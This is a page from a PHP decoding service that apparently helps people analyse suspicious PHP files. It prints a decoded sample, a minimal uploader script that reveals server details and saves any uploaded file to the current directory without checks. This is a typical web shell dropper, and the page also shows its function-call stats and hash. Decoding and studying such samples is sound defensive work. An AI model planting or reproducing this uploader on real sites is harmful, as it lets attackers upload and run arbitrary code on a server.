Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php echo "Uploader"; echo $_SERVER['DOCUMENT_ROOT']."</br>".php_uname(); $cwd = getcw..

Decoded Output download

UploaderNone</br>Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686

Did this file decode correctly?

Original Code

<?php
echo "Uploader";
echo $_SERVER['DOCUMENT_ROOT']."</br>".php_uname();
$cwd = getcwd(); Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) {     move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);     Echo "<script>alert('upload Done'); 	 	 </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ;

?>

Function Calls

getcwd 1
php_uname 1

Variables

None

Stats

MD5 523a5188607ff3a5a77b7cfcbacaee49
Eval Count 0
Decode Time 48 ms